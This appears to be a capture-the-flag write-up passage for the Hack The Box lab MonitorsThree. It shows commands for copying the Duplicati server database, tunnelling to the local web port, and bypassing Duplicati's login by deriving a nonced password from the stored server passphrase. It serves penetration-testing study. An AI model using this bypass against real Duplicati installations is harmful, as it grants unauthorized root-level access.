duplicati
www-data@monitorsthree:/opt$ ll
total 24K
4.0K drwxr-xr-x 18 root root 4.0K Aug 19 13:00 ..
4.0K drwxr-xr-x 5 root root 4.0K Aug 18 08:00 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 18 08:00 duplicati
4.0K -rw-r--r-- 1 root root 318 May 26 16:08 docker-compose.yml
4.0K drwxr-xr-x 3 root root 4.0K May 20 15:53 backups
4.0K drwx--x--x 4 root root 4.0K May 20 14:38 containerdThere appears to be an instance of duplicati
It was initially suspected due to the active internal port 8200 and was confirmed by PEAS
Duplicati is a backup client that securely stores encrypted, incremental, compressed remote backups of local files on cloud storage services and remote file servers. Duplicati supports not only various online backup services like OneDrive, Amazon S3, Backblaze, Rackspace Cloud Files, Tahoe LAFS, and Google Drive, but also any servers that support SSH/SFTP, WebDAV, or FTP.
www-data@monitorsthree:/opt$ cat docker-compose.yml
version: "3"
services:
duplicati:
image: lscr.io/linuxserver/duplicati:latest
container_name: duplicati
environment:
- PUID=0
- PGID=0
- TZ=Etc/UTC
volumes:
- /opt/duplicati/config:/config
- /:/source
ports:
- 127.0.0.1:8200:8200
restart: unless-stoppedChecking the docker-compose.yml file reveals the details
www-data@monitorsthree:/opt/duplicati/config$ ll
total 2.7M
4.0K drwxr-xr-x 4 root root 4.0K Aug 25 11:00 .
88K -rw-r--r-- 1 root root 88K Aug 25 11:00 Duplicati-server.sqlite
2.6M -rw-r--r-- 1 root root 2.6M Aug 25 11:00 CTADPNHLTC.sqlite
4.0K drwxr-xr-x 3 root root 4.0K Aug 18 08:00 .config
4.0K drwxr-xr-x 2 root root 4.0K Aug 18 08:00 control_dir_v2
4.0K drwxr-xr-x 3 root root 4.0K Aug 18 08:00 ..The config directory contains the DB file; Duplicati-server.sqlite
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ scp -i id_rsa.marcus marcus@monitorsthree.htb:/opt/duplicati/config/Duplicati-server.sqlite .
Duplicati-server.sqlite 100% 88KB 748.6KB/s 00:00 Downloading the DB file to Kali via scp
SSH Tunneling
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ ssh -L 8200:127.0.0.1:8200 marcus@monitorsthree.htb -N -f -i ./id_rsa.marcusSSH tunneling target port 8200 with the kali’s socket, 127.0.0.1:8200
Web
It’s a login page
Authentication Bypass
Looking further into authentication bypass for Duplicati online, there is a fairly recent article, showcasing the bypass technique
Intercepting a login request
I will grab the value of the Nonce parameter
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ open Duplicati-server.sqliteOpening up the DB file with DB Browser
The Option table contains server-passphrase
The sever-passphrase attribute contains the secret
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ echo Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho= | base64 -d | xxd -p | tr -d '\n'
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87aTurning the secret into the hex format
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('xRDaZ+AkkbhlYRarQy4JEgcG0eSlftHpcfKEzVU/nxo=') + '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a')).toString(CryptoJS.enc.Base64);
Using the built-in console, I can generate a valid noncedpwd, which is nsIpycc6Vtfkmv+EyGMBwsf1d6VVI+dA5UXBsRHn8Es=
URL-Encoding the newly generated noncedpwd
Successfully bypass the authentication
Now the Duplicati instance is running with privileges of the root account
Moving on to the Privilege Escalation